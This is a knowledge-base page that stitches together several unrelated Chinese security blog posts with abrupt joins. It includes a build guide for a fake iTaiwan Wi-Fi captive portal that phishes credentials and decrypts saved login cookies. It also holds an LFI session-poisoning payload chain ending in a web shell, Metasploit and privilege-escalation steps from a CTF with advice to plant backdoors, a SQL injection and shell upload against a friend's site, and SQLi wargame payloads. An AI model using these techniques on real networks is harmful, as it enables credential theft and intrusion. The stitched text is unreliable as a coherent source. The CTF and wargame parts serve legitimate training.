HITCON Knowledge Base

手機連上Wifi會測試網路的可用性 而不同OS有不同的測試路徑 Android: http://connectivitycheck.android.com/generate_204 Apple: http://captive.apple.com/hotspot-detect.html Windows: http://www.msftconnecttest.com/connecttest.txt 根據這些測試連線的response status 手機就可以知道Captive Portal的存在 並且重新導向到登入的頁面 這東西太有意思了！ 我開始研究了"Captive Portal 釣魚"(以下簡稱CP釣魚)

正文

CP釣魚有許多的優點 1. 信任的Wifi名稱，裝置會自動連線 2. 自動跳出登入視窗，降低使用者的懷疑 3. 獲取登入帳號密碼，手機也是很重要的個資，許多人帳號密碼在不同網站是重複的 4. 不用提供網路服務，劣質、低成本 要實作CP釣魚有幾個重點 1. 一個同名的Wifi熱點 2. 自動跳出登入畫面 3. 一個與原登入頁面相似的釣魚頁面 4. 將輸入的資料傳入到我的資料庫 而我使用的硬體設備有 1. RPi2 2. TL-WN722N(v2)

1. 一個同名的Wifi熱點

這個太簡單了 應該大家都做得到 打開手機熱點編輯一下熱點名稱就好了 我在RPi2使用hostapd這個套件來管理我的Wifi名稱 當然這個Wifi的SSID就是"iTaiwan"

2. 自動跳出登入畫面

在了解每個OS的Captive Portal機制 且大部分的裝置預設會採用分享器提供的DNS設定 我決定採用dnsmasq來做DNS hijacking 將所有的DNS請求都解析到我的裝置上

並且將每一個OS的測試連線對應到一個跳轉頁面 將這些請求都導向到我的釣魚登入頁面

3. 一個與原登入頁面相似的釣魚頁面

我使用HTTracker來將iTaiwan的登入頁面砍回來

再將登入的表單修改成傳入我的處理頁面

4. 將輸入的資料傳入到我的資料庫

最後我的處理頁面會將使用者的輸入儲存到資料庫中

5. 讓他看起來更像

利用剛剛的DNS hijacking 我讓他的網址與原本的iTaiwan一模一樣

並且每次都只會導引到失敗頁面 因為跳轉的太快 在fail.php sleep(3) 最後就變成了這樣

受害者以為登入失敗 還會嘗試其他組密碼呢XD

進階利用

以上的釣魚都是利用人心的弱點 接下來利用裝置才是重點！ 在更改iTaiwan頁面的時候我注意到了一個功能 沒錯就是"記住我" 關鍵的程式碼如下

function cookie_check(login_form, key) { var frm=login_form; var remember=login_form.remember; var autologin=login_form.autologin; var autologin_set = getCookie("Autologin"); var type; if( (type = getCookie("TYPE"))!== null) { if( type == "TPE") { login_form.type[1].checked = true; } else if( type == "NTPC") { login_form.type[0].checked = true; return; } else if( type == "TANet") { login_form.type[2].checked = true; } else if( type == "iTainan") { login_form.type[3].checked = true; } else { login_form.type[0].checked = true; } } if(getCookie("ID")!== null) { login_form.clt_user.value=Aes.Ctr.decrypt(getCookie("ID"),key,256); if(autologin_set == '1') { autologin.checked=true; } else { remember.checked=true; } } if(getCookie("Serial")!== null) { login_form.clt_pass.value=Aes.Ctr.decrypt(getCookie("Serial"),key,256); } if(getCookie("Autologin") == '1') { if(login_form.onsubmit()) { login_form.submit(); } } }

"記住我"使用了cookie來加密儲存使用者的帳號密碼 在我仔細研究後發現key的產生方式與裝置的MAC address有關 攻擊者可以利用真實網站送出不同的MAC address得到不同的key

一個Wifi熱點能輕鬆得到裝置的MAC address 而DNS hijacking後的網址的吻合性 也能輕鬆拿到瀏覽器內同網域下的Cookie 有了Cookie，有了MAC address，不用使用者互動拿到帳號密碼 簡單來說 只要手機曾經使用過"記住我" 連上釣魚Wifi跳出登入視窗 帳號密碼就送出了 而且不少裝置在關閉螢幕下也能跳出登入視窗 使用者根本無法察覺 因為這一切都是預設動作 DEMO影片(以下實驗均為學術研究用途)

後記

也沒發現能直接上傳檔案的入口，因此把策略轉為嘗試引入含有環境變數、Access Log 或其他可能含有使用者可控的資料的檔案。

首先嘗試環境變數的檔案：

/file.php?file=../../../../../proc/self/environ

可惜結果是失敗，可能是不夠權限進行讀取，再將目標轉移到網頁的 Access Log、Error Log，首先嘗試取得 Web Server config，順利發現在預設路徑的 Apache httpd.conf。

/file.php?file=../../../../../etc/httpd/conf/httpd.conf

並且依據設定檔內容確定 Log 檔案在 /etc/httpd/logs/access_log，但經測試無論是 access_log 還是 error_log 都無法被順利引入，應該也是讀取權限不足所導致。

到這邊因為經驗不足，已經沒有其他利用想法，只好開始上網爬大量資料，發現有文章表示除了以上幾種常見檔案，還可以嘗試 session 檔案，同時也注意到該網站確實有啟用 session 功能，心想在某些情況下，或許能控制到 session 檔案的內容。二話不說直接引入 session 檔案。(爬文得知預設檔案路徑通常是 /tmp/sess_{SESSION_ID} )

/file.php?file=../../../../../tmp/sess_{SESSION_ID}

沒想到一次就中大獎，更讓人高興的是注意到出現的內容含有「file」關鍵字。

這表示 GET 參數的內容被儲存至 session 中，既然如此，那就可以直接在 GET 參數上注入可執行的 payload，但因為包含進來的 session 內容會是上一次請求時的內容，必須先對網站請求一次使 payload 儲存至 session 中，才能引入 payload 讓其執行。

初步測試直接執行：

/file.php ?file=../../../../../tmp/sess_{ID} &a= &b=ls -la

但結果卻是失敗的，理由是測試後發現引號「 ' 」、「 " 」都被網站取代成「 \' 」、「 \" 」。

(以下因為對 PHP 語言不夠熟悉，導致繞了個彎，事後朋友有提醒我 PHP 使用 $_GET[b] 也是可以被接受的Q__Q)

此處就必須用到 PHP Array 的一個有趣特性，依據官方的說法：

包含有合法整數型值的字符串會被轉換為整數型。例如鍵名 "8" 實際會被儲存為 8。但是 "08" 則不會強制轉換，因為其不是一個合法的十進制數值。

這意味著當請求的 GET 參數長這個樣子：

file.php?1=Hello,world!

我們就可以透過 $_GET['1'] 或 $_GET[1] 取得 'Hello,world!' 的字串。

即便引號被跳脫，我們仍然能順利獲取 GET 參數的內容，所以只要將原本的 payload 替換成以 $_GET[1] 獲取指令即可。

/file.php ?file=../../../../../tmp/sess_{SESSION_ID} &a= &1=ls -la

於是乎 ~~ bang ~~

一個新鮮的 Web Shell 就取得了！

總結一下此次經驗

當遇到 LFI 漏洞時，可以先檢查一下幾種可能的檔案：

/etc/passwd

/proc/self/environ

All possible config files ( e.g. Apache /etc/httpd/conf/httpd.conf )

Web server access, error log ( e.g. /etc/httpd/logs/access_log )

Session files ( e.g. /tmp/sess_{SESSION_ID} )

Jeopardy 是大家最熟悉的解題拿Flag 拿到Flag送出就可以得到分數

Attack and Defense 每個隊伍都有屬於自己的服務主機 因此除了要攻擊對方的主機之外 還需要修補自己的程式漏洞防止被攻擊 如果成功攻擊 攻擊者會加分 被攻擊者會扣分

King of the Hill 主辦方提供多台主機 參賽隊伍同時去攻擊這些主機 攻進主機後在首頁放上隊伍的Flag就會開始計分 計分的方式為每分鐘計分一次 如果隊伍有佔領主機就會加分 因此佔領越多主機 佔領時間越久 累積的分數也就越高

這次的比賽題目幾乎都是已經公開的漏洞 因使對於程式能力需求也比較低 不太需要逆向工程或是原始碼審查 而需要大量的工具去嗅探主機潛藏的漏洞

如果說找0day是用邏輯挖掘 那麼找已知漏洞就是用資訊挖掘了！ 因此如何利用工具挖掘漏洞就是一個重點 不只要挖得到 還要挖得快

工具介紹

以下會介紹我們隊伍有使用到的工具

Kali Linux

這是一個Linux的OS 專門用來做滲透測試 裡面內建了許多工具 (下面沒有特別提到的工具就是內建)

offensive-security有提供VM版本可以快速架設起來 在設定VM時網路建議選擇Bridge 這樣可以直接與比賽的內網相連 這樣在建立反彈shell的時候會簡單很多

但也因此建議把預設密碼及以及防火牆打開 雖然比賽有VLAN切開各隊伍的網路 也有規定不能對對手攻擊 但防人之心不可無 主機如果反過來攻擊我們可就糟了

Zenmap

Zenmap是nmap的GUI版

GUI版不用記指令 快速上手 主要的功能為掃描電腦端口 可以快速地知道目標主機可能存在哪些服務

OpenVAS

最新版本的VM沒有內建 安裝需要非常久的時間 在安裝過程會產生admin密碼 記得要複製起來 方便之後更改

這是一套非常強大的弱點掃描工具 也是我們隊伍得分最大關鍵 他可以透過行為來分析目標主機 可以獲得相關資訊或是可能存在的漏洞

Metasploit

這是一個漏洞利用framework工具 當我們知道目標可能存在漏洞 我們可以利用對應的模組 透過Metasploit去進行驗證或是攻擊

Sparta

是一個滲透工具組合包 但我們主要是拿來進行暴力破解

比賽過程&題目

這次的比賽有100台機器 20種類型 每個類型5台 (這在比賽中才慢慢發現)

比賽一開始我們就用zenmap 對所有目標IP進行"快速"掃描 掃描到的資訊

開啟OpenVAS一樣進行全盤掃描 但OpenVAS需要花的時間非常多 第一天比賽結束前都還沒掃完

我們的策略是在攻進主機後 利用iptable把所有的port關掉 只留下80port來計分

上面的作法可能只適用於這次的比賽 很多的大型比賽會檢查服務的可用性 所以攻進去之後 需要去修補漏洞並且更新程式 如果服務沒有正常運作 分數也就不會計算 但這次比賽沒有這樣的規則 因此關掉服務不是一個好方法 但卻很有用XD

有解出來的題目

Kali

這一題完全就是意外 在開賽不到10分鐘就讓我們隊伍破蛋

我發現一台主機只開了22port 對於ssh沒有太大的印象有新漏洞 因此直接嘗試了手動猜密碼 (這是壞習慣 應該要開工具破的XD) 結果一下就猜到了root:toor 發現是一台kali主機沒有更改預設密碼

第一時間進去先改密碼 望向記分板才想到要寫辨識碼到網頁才會計分 kali主機內建apache 因此只要執行

service apache2 start echo '$our_flag' > /var/www/html/index.html

就這樣拿到了一台主機

另外兩台是透過OpenVAS找到的 掃描結果如下

RDP

RDP(Remote Desktop Protocol) 通常用來遠端桌面操控Windows系統

這一題首頁上就給了

rdp:user/123456

登入後一樣先改密碼 但發現使用者的權限不足 沒辦法修改網頁的內容 可以得知這是一個Windows提權題目

系統是Win7 SP1 我們嘗試了幾個不同的payload 最後我們使用CVE-2016-0051成功提權 之後只要進去xampp的目錄下更改index.html成我們的flag就可以了

VNC

VNC(Virtual Network Computing) 通常用來遠端桌面操控Linux系統

這一題是OpenVAS掃到的 掃描結果如下

可以看到一樣是弱密碼的問題 我們登進去發現其實有其他隊伍已經進來過了 但他們沒有做正確的防守動作 (vnc的認證如果不是經由ssh 更改使用者密碼是沒用的)

因此我們換掉首頁後用iptable把服務關掉 用同樣的方式刷了四台主機 但沒想到過了一會兒只剩下三台 最後心得那邊會提到這個失誤的狀況

PHPMoAdmin

PHPMoAdmin是一個由PHP構成用來管理MongoDB的工具

一樣是由OpenVAS掃到的 掃描結果如下

可以看到這是CVE-2015-2208任意代碼執行的漏洞

Metasploit有exploit可以直接用 這裡示範一下大概要怎麼使用Metasploit

msf > search phpmoadmin Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/multi/http/phpmoadmin_exec 2015-03-03 excellent PHPMoAdmin 1.1.2 Remote Code Execution msf > use exploit/multi/http/phpmoadmin_exec msf exploit(phpmoadmin_exec) > show options Module options (exploit/multi/http/phpmoadmin_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST yes The target address RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The URI path of the PHPMoAdmin page VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 PHPMoAdmin msf exploit(phpmoadmin_exec) > set RHOST 172.16.42.110 RHOST => 172.16.42.110 msf exploit(phpmoadmin_exec) > exploit

拿到了shell原本以為結束了 但沒想到才剛開始真正的難題 進去之後發現權限不足 才知道這一題還需要提權

提權首先要先了解系統版本 我印象中是Ubuntu14.04 內核版本4.4.0-53 用searchsploit查找相關的提權方式

root@kali:~# searchsploit linux 4.4 ubuntu -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------- Exploit Title | Path | (/usr/share/exploitdb/platforms/) -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------- Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC) | linux/dos/41457.c Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation | linux/local/39772.txt Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation | lin_x86-64/local/40049.c Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit) | linux/local/40759.rb Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation | lin_x86-64/local/40871.c Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation | linux/local/41458.c -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------

沒想到全部都沒有用... 最後嘗試之前通殺Linux的Dirty COW(CVE-2016-5195) 第一台主機成功佔據5秒 主機就crash了...... 我們用了四個不同的exploit嘗試了另外4台 每個的最終結果都是crash.....

原本要衝一波高分的 沒想到獵物全部都變成了垃圾主機(別人也攻不破) 回來研究才發現要選擇寫入/etc/passwd 在getroot的方式是最穩定的 例如這個exploit 但沒有嘗試過也不曉得會不會成功 這個題型沒拿下來真的是我們隊伍的一大損失

沒解出來的題目

很多主機其實有看到漏洞 但因為其他隊伍已經攻佔了 很多都是推測跟想法 還有跟其他隊伍賽後的討論

XVWA

XVWA(Xtreme Vulnerable Web Application) 是一個用來練習Web Hacking的框架 可以在Github找到源碼

我們用了"OS Command Injection"打了進去 但權限不足 嘗試提權看看 版本是Ubuntu 16.04 內核4.4.0-75都是最新的...

賽後討論沒有一支隊伍可以提權成功 可能有其他的洞 或是有其他提權方式 ~~但大家都覺得這是在釣0day~~

HFS

HFS(HTTP File Server) 用HTTP來管理遠端檔案系統

CVE-2014-6287 Metasploit:exploit/windows/http/rejetto_hfs_exec

SMB-MS17

SMB(Server Message Block) 主要功能是使網路上的機器能夠共享資源

跟WannaCry一樣的洞 CVE-2017-0144 Metasploit:exploit/windows/smb/ms17_010_eternalblue

Shellshock

Bash上的知名漏洞

CVE-2014-6271 Metasploit:exploit/linux/http/advantech_switch_bash_env_exec

Vul Mail

PHPMailer-RCE

首頁上有一個Mail Form 討論得知要用CVE-2016-10033解出來

Struts2

Struts2是用於開發J2EE的WebApp框架

沒有聽到是用哪個洞 但推測是CVE-2017-5638 Metasploit:exploit/multi/http/struts2_content_type_ognl

b374k

b374k是一個PHP構成的後門程式

一樣是暴力破解密碼 但首頁是看不出問題的 主要需要具備的能力有 1. 網頁目錄掃描 1. http的暴力破解

IRC

IRC(Internet Relay Chat) 是一種透過網路的即時聊天方式

CVE-2010-2075 Metasploit:exploit/unix/irc/unreal_ircd_3281_backdoor

留言板

首頁是一個留言板 沒有XSS漏洞 分析是一個Honeypot 很多服務都有開但都是假的 據說刷得夠快就會計分 最後沒有隊伍拿下

tryit

首頁上只有"tryit" 一樣是Honeypot 很多服務都有開但都是假的 一樣最後沒有隊伍拿下

Bobby Blog

首頁上面寫了Windows 3.1 聽到最酷的解法是暴力解出FTP Administrator密碼 正常解法應該用user帳號暴力就可以登入 總而言之都是弱密碼XD

心得

分析方面

賽後發現用zenmap掃描所有目標是不太好的 掃描全部的port浪費太多的時間 應該針對有特定弱點的port先找出來分析 ex:21(ftp),445(smb),8080(hfs)...等等

防守方面

其中一台原本在我們手上的機器 我們在打進去後換了首頁就用iptable鎖死了 沒想到其實這台主機已經被別人藏了web後門 這台主機就這樣被別人搶了回去...QQ 因此以後記得要檢查web後門 然後也要自己藏web後門再利用iptable鎖上

技巧方面

雖然有記分板可以看到哪些隊伍佔據了哪些主機 但記分板上沒有ip位置 因此我們浪費很多時間在詢問主機的存活 如果設計一個monitor來監看這些主機的狀態 一定能大大的幫助我們找尋下一個攻擊目標

另外這次還有非常多時間浪費在打指令上 如果能加強shellscript相關技能 這次的比賽一定能更輕鬆

總結

這次的題目有相當多的弱密碼 相信這是想告訴我們弱密碼其實比我們想的還嚴重 除此之外很多已知漏洞都還存在現實中 漏洞不會自己消失 因此系統更新很重要

感謝國網中心 花了很多心思去設計題目 還有超棒的計分板介面

感謝我的隊友 在期末大爆炸還要被我抓來討論戰術 在比賽中也不斷的幫助我

後我詢問他企業內部負責資安部份的人有幫忙嗎？接著他就回覆我說我們公司太窮，老闆為了省錢方面就在安全方面沒有投入，當初他們就請了一間認識外部廠商幫忙設計網站架構，之後最後網站測試沒太多的問題，就付錢了事！這時候公司形象網站就在此誕生了~

他繼續向我苦談，遭駭客入侵不是今天才發生的，而是他們在半年內都遭遇過4次同樣被置換首頁，又說了有請初期設計這個網頁廠商幫忙看下是怎麼回事，但是廠商不領情回覆說"網站沒有漏洞問題，所以我們盡可能幫你恢迅速復首頁以免影響運作” 所以都以忽略心態帶過。

但是再請外包商承接這個設計案子前必須合約都要有明確地資安維護服務這塊標準，不然事情發生後說再多都是空談

所以朋友跑來向我求助，但是小弟本人我還在求學當中的學生，並沒有在資安事情實作上所以對於這種經驗是完全零基礎，所以我告訴遙遠的縣市朋友告訴他們可以請資安公司廠商幫忙協助調查以及後續修復問題，他說：我們公司在這方面沒有認識的！

痾..我愣的一下，之後他瘋狂回我向我求救，但是對於我這種菜鳥，完全沒有碰過真正戰場上對抗攻擊者QAQ.... 所以我把我自己的本身現況問題告訴了他，但是他說道："老闆說沒有任何關係！"

(圖：取自網路圖庫)

這時候我又愣了一下... (幾隻鴨子飛過去了....)

我朋友就說" 就幫忙看下！拜託了" ，就好吧..！

(小探員087 ) 進行

(圖：取自網上媒體報導)

我課後放學回家鼓起勇氣，立馬打開電腦，就打開他說的網頁，已經恢復了原本樣貌。

(由於保護當事人，所以塗掉有關該公司字樣XD)

之後朋友在線，我向他詢問了關於公司內部所有的主機連線帳號密碼和該網站FTP 登入權限管理帳戶！

（圖二：非常抱歉xD 可能造成你的眼睛受到痛苦，同樣為了保護當事人權益，所以我塗掉了有關該公司字樣)

幾小時過後，他傳給我了(圖二）

摁，我確實收到了(這不是廢話嗎xD）我就先對網站進行一次黑盒滲透測試。

不到10分鐘，網頁存在兩種常見漏洞(SQL Injection 、XSS）↓

但是有了SQL 資料庫注入漏洞，並不代表網站可能就存在很嚴重影響，因為涉及方面要看你資料庫是否有存取關於後台管理帳號以及網站權限夠不夠可以上傳Shell、提權、敏感資料，所以都還是算是中危的。

但是！有了漏洞不管是輕微還是高危都要盡快修補！因為不知道在未來某個地方或者哪個點有了其他漏洞可以組合造成嚴重漏洞，所以企業、政府，任何網站管理員對待安全漏洞都必須謹慎看待。

在上面我對資料庫已經爆庫列舉了出來，接下來我要先嘗試這些當中資料庫是否有敏感資訊洩漏了。

直接丟到tools dump ，之後再資料庫有個表member 再詳細檢查了下，確實是一組帳號和密碼！！

看了admin 、最高管理員字樣應該是後台或者哪裡發布頁的管理員沒錯了！

對於密碼沒有使用加密後的hash 值而且還是明文形式暴露...真是可怕...

之後就是要找後台登入，一般都會使用常見字典檔下去run 看有沒有解析到對應頁面

但是我選擇使用Google hack 方法來搜尋網站的後台，看能不能搜尋到還要靠運氣了。

很明顯有個管理版面登入連結，所以我點進去了(省略掉此後台概觀，因為當時在調查忘記了沒有儲存起來，只截一些暴露的東西給朋友公司看，也沒想到未來我會拿它來寫文章XDD 所以非常對不起QAQ..），拿上面所爆出來的User 、Password 來登入，就非常幸運地進入到了後台！

跳過這一切的揣摩，我到了後台看到有上傳圖片這個地方，並沒有限制任何檔案上傳..所以我upload php shell 可以控制看到這個網站所有目錄

接下來就是要看log ，因為被駭要預先關閉受影響的主機後關閉對外連線、在清查log 日誌

(圖三)

看了下Log 操作日誌，看了下驚呆了..(圖三有一組IP 地址在嘗試進行拆字段動作)

這個IP 怎樣看都不像是台灣ip網段，丟去search

來自法國.. 我不能判定他是不是國外人在對網站進行攻擊或者有心人士利用VPN 跳板或Tor 進行隱藏都有可能，由於他踹的是紅色塗掉.php 這檔案，我就先找到這php 看看

非常有嚴重的撰寫錯誤導致SQL Injection，直接把獲取的參數($_GET[“id”]  ) 帶入到查詢，且沒有對($id ) 進行檢查。

修補可以使用Prepared statement 方式，由於修補後我就不在敘述了，這篇主要在於偏向個人調查xD (有機會在各位分享修補SQL 詳細解說XD)

當然我沒有什麼過調查經驗，所以我還是傻傻地人工檢查每個檔案Code QAQ

我的老天鵝阿...

竟然這兩個檔案還有很多存在幾乎相似的寫法，都存在SQL Injection …

當然我就對這網站不放心，就每個檔案check review

發現以上檔案都存在同樣有SQL 隱患的寫法....而且幾乎都是複製過去只是有些檔案 include 不同文件而已..沒什麼區別

就經過了2個小時修復... 29個php file 都存在SQL 漏洞..

之後就是測試了，就沒有SQL 了

當然我另外說XSS 個人修復，在於php 我是使用htmlentities 在每個輸入和輸出點過濾字串

最後經過了2天，我到朋友公司工作室泡茶，問他最相關有沒有在遭受攻擊。

此時我們在聊天，旁邊他的同事又傳來被入侵，坑爹的我.. 上前查看

額..漏洞該修的都修好了，後台我也進行了相關權限控管和資料庫，但為什麼還是被置換首頁！！

就真的很不甘心，我就用了朋友公司電腦看了下↓

還是一樣看了log，TMD .. 那天只顧滲透網站漏洞還有忙修補沒有想到要在詳細檢查下駭客留下的web shell xDDDD

之後找到攻擊者留下的網頁木馬刪除之後再進行全盤檢查，發現沒有繼續可疑的shell

就這樣安詳地過了5個月，公司就沒有再被入侵了xDD 對我個人來說是非常一件值得有成就感！，雖然知道駭客是使用存在SQL Injection 進入之後上木馬，但是主要也是我非常幸運的自己熟悉這些手法和駭客剛好也是用這技術去踹xDD 所以剛好可以略勝一籌。

最後朋友公司Boss 經過了5個月沒被駭客入侵，還是聽內部的勸聽重新請了廠商而且來負責網站設計部份和安全！

當然現在社會越進步，科技也卓越成長，所以我自己寫的這篇並不能抵擋所有駭客攻擊或者修復了這些OWASP 常見top 就能隱憂無患，因為駭客手法不斷在改變創新，所以網站工程師必須有安全意識和對現代的手法有相當認知，接收新漏洞資訊才能對症下藥。

第一次使用者直接在空白欄位處輸入你想要的帳號和密碼，選擇Join 通過以後，再打一次帳密，就可以Login囉

網站就長這個樣子 很像打怪獸。

要一關一關的往上升級才能破關喔 接下來我們就開始吧

SQL INJECTION FireFox-HackBar的用法

你不用真的打在網址列那邊，就可以發生作用囉 以los.eagle-jump.org的第一題為例

1. 先把原來的url複製到loadURL裡面

2. 在Load URL的網址列後面打:?id=&pw=aaa (所以完整的列表會顯示:http://los.eagle-jump.org/gremlin_bbc5af7bed14aa50b84986f2de742f31.php?id=&pw=aaa) 接著按Execute或ctrl-X 你會發現他的頁面都沒有變。

這樣你可以在pw後面一直改成你想要的東西試試看

3.如果我在id的地方改成’1′ ，網頁就會吃進’1’。把數字的部分選起來，旁邊可以再按’+’，值就會繼續往下加下去唷

很方便吧~ 看完了工具小介紹 就可以回去los.eagle-jump.com試試看囉

SQL INJECTION los.eagle-jump-1-Gremlin-writes up

怪獸第一關

題目:

解題原理:

解出query，也就是說:讓程式跑到solve(“gremlin) 就破關囉(倒數第二行) 換句話說，id=’{$_GET[id]}‘ and pw=’{$_GET[pw]}‘"這兩個都要對，就可以到solve囉

在做這一題前，有一個小小的題外話。 就是我的環境是使用FireFox，並且下載外掛HackBar唷。

(可以參考另外一篇FireFox HackBar的用法)

切入正題，來解正題吧select id from prob_gremlin where id=" and pw="

這題蠻簡單的。 採用大家最熟悉的SQL inject語句 ‘OR 1 =1-- 但是這到底是什麼意思呢?

我們把他插進語句當中: select id from prob_gremlin where id=' 'OR 1 =1 --' and pw="

其中，我們仔細看:

id=' 'OR 1 =1 --' id="(空字串) OR(或者) 1=1(這很白話  1等於1) --’ (減減的意思，是註解的意思。也就是說  註解後面的東西，程式不會讀。)

整體來說:id是空字串(False)或者(OR)1等於1(True) True OR False===>在邏輯上，一定是True。所以造成語句的成立。 

最後我們實作看看:

就看到出現GREMLIN Clear! 過關~

進入第二題~ 補充一下，這題解法不只一種喔

SQL INJECTION los.eagle-jump-2-Cobolt-writes up

解完第一題以後就會發現第二題的框框亮綠燈啦~ Go~

這一題和第一題一樣，前面也有一些阻擋的措施。 不一樣的地方是:

1. pw=md5('{$_GET[pw]}') ==>他把password的地方用了md5! 2. if($result['id'] == 'admin')==>他的id要等於admin

所以我們來開始吧 我們先用上一題的想法試試看: ‘ or 1=1-- 結果出現:

Hello rubiya You are not admin 

顆顆。結果很明顯: 你不是admin 但是這代表什麼呢?剛剛的語法代表整個where以後的都無效 所以把整個資料庫都撈出來 hello “rubiya"可能是第一筆的資料

所以我們假設admin是在後面其他筆 所以我們來撈撈看第二筆 註解一下:SQL 撈資料的話我們可以用一個關鍵字:limit (以下三張圖片from: http://www.codedata.com.tw/database/mysql-tutorial-basic-query)

那我們就來limit看看吧 試試看囉

?id= ' or 1=1 limit 0,1 -- ‘

                             Hello rubiya You are not admin 

?id= ' or 1=1 limit 1,1 -- ‘

                              COBOLT Clear!

哈哈  這樣就解開了

哈哈  這樣就解開了。

(?id= ' or 1=1 limit 1,1 -- '   ======>會沒有資料顯示)

那我們來試試看別的方法:

如果說我們已經知道他要的id是admin。但是我們不知道密碼。所以決定把密碼之後的東西都註解掉。( HTML對於井號的encoding 是 %23) : # 打進來也可以破關唷

SQL INJECTION los.eagle-jump-3-goblin-writes up

第三題比較不太一樣

題目要的是 1.     $_GET[no] ==>Number 2.     id='admin' 

既然要找Number，那我們就用上一題的方法來試試看啦 no=0 時，沒有出現東西 no =1時，出現了guest!

如果no=2的時候，又沒有東西出現。 那剛剛出現的那一行代表什麼意思呢?? 就是程式已經跑到了倒數第三行(但是沒有繼續倒數第二行):

  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 

那我們現在再試試看另外一個方法(又要用到邏輯啦) 我們已經知道no=1的時候是有東西的了(True) 如果我們打:

?no=0 or 1=1

一樣會出現Hello guest 表示什麼呢?

no = 0 (False) or 1=1( True)  ==>False or True == True

我們現在已經把前面都弄成True囉 但是admin還是沒有出現啊? 他應該是在no= ?  但是我們不知道?是什麼。目前只知道?=1時有guest。(這是True)

?=2 和 ?=0 時跑不出東西 所以我們要先讓前面的id=’guest’失效。讓程式往下跑到後面，才能出現admin。

來看看這樣:

where id=’guest’ and no=0 or 1=1 and no = 2

一行行來看

where id=’guest’ (True)(因為資料庫裡面有guest的id) and(邏輯運算) no=0 (False)(因為沒有東西) True and False == False 這樣第一個部分就被False掉了

接下來

or(邏輯運算) 1=1 (True) 這樣整體又變成True 然後 no = 2 (True and True = True)

這樣就破關囉~~

(好一個迂迴)…. 這一段多做幾遍看看囉~

SQL INJECTION los.eagle-jump-4-orc-writes up

前三題是比較基本一點的題型 接下來難度變比較高囉

這一題的話有兩個地方在跑 第一個:先用語句去查資料庫 @mysql_fetch_array(mysql_query($query)); ，如果有資料就回覆 echo "

Hello admin

然後把密碼加上slash，再丟到資料庫去query。 如果對的話就過關了 (簡單來說，就是密碼對了 你就過關了)

開始來試試看吧 首先我們先把我們可以控制的地方打進去 ?pw=’ or 1 %23  (可以參考前幾題的解法)

把密碼註解掉以後，我們發現他可以出現Hello的字樣

也就是說，程式已經跑到中間的那行

if($result['id']) echo " Hello admin “;

這邊開始要帶入一個substring的觀念(可以參考這個網站:http://www.1keydata.com/tw/sql/sql-substring.html)

我們剛剛打:?pw=’ or 1 %23  可以跳到Hello那段。 表示說 1是 True。換句話說，我們打?pw=’ or (id=’admin) %23也是可以的。(這邊就不截圖了可以自己嘗試看看)

從這個觀念繼續延伸。因為題目是要我們猜密碼。所以id的部分改成pw做看看。 但是由於我們不知道密碼，所以也不知道應該要怎麼開始…對吧@@"。 但是還是要試試看啊 不然怎麼破關。

這邊又要講到SQL的另外一個語法:like。 like是部分比對的意思。 假設真的密碼是test1234 如果我打 pw like ‘t’  ===>這時候應該就要有True的結果。

所以說，瞎子摸象的來猜密碼囉 我們就先從數字版+英數混合(左上角選擇AlNum)開始吧

第一個 ?pw=’ or (pw like ‘1%’) %23  沒有東西。

然後選綠色的+  變成pw=’ or (pw like ‘2%’) %23。 哈哈  超級賽的，居然跳出Hello admin。

如果再選+，變成pw=’ or (pw like ‘3%’) %23。又沒有東西。 表示 like 2%是對的。(密碼是2開頭)

然後就是繼續猜啦

pw=’ or (pw like ‘21%’) %23  ==> x pw=’ or (pw like ‘22%’) %23  ==> x

一路跑到

pw=’ or (pw like ‘29%’) %23  ==>v

就這樣一路猜下去吧 最後答案是 295d5844

最後最後 我們把語句改成 pw=295d5844 過關

p.s 使用 ?pw=1’ or (id=’admin’ and length(pw)=xxx) %23 其中xxx為密碼長度 等於的地方可以改成大於或小於之類的 就可以先來猜猜看密碼總共有多長

另外 可以使用(id=’admin’ and substring(pw,1,1)=’xxx’) 用substring這個語法來得知說第幾位的密碼應該是多少

ex:

?pw= 1′ or (id=’admin’ and substring(pw,1,1)=’2′) %23

SQL INJECTION los.eagle-jump-5-wolfman-writes up

來到第五關啦 這一關的話，前面條件有過濾"空白"喔

和上一題一樣，來猜密碼啦 ?pw=’ or 1=1 %23 結果他出現:No whitespace ~_~  (我就說他會過濾空白吧@@")

SQL injection要繞過空白的方法，就是把它變成註解。 我們的Hack Bar裡面就有這個功能喔。

點選上面SQL -> space to inline comment->他自動會幫你註解成這樣:?pw=’/**/or/**/1=1/**/%23

我們再把他送出，就可以繞過第一關囉

Hello guest(可是還不是admin) 但是至少已經到程式的倒數第三行啦~(已經取了第一筆資料) 接下來就是要把id變成admin囉 直接加再後面 顆顆 就過了 ^^

  SQL INJECTION, 工具 Burp Suite 使用介紹

其實就是一個代理伺服器 所有流量都經過他再到網路上 這工具是用java寫的。所以要先安裝JRE才能跑唷

簡單介紹一下各個頁籤 1. Target:我們上網流程中，全部經過哪些站台 比如說我們來實驗一下: a. 我們先用firefox的外掛FoxyProxy，設定自己本基為代理伺服器”localhost:8080”(先於選項呢 設定localhost:8080) b. 設定好以後，Burp Suite的proxy就會亮

c. Proxy這個頁籤裡面就是有你有那些參數那些封包等等

d. 不要的話就把他先暫停掉，history裡面會有結果

e. Target就會有站台的assignment。

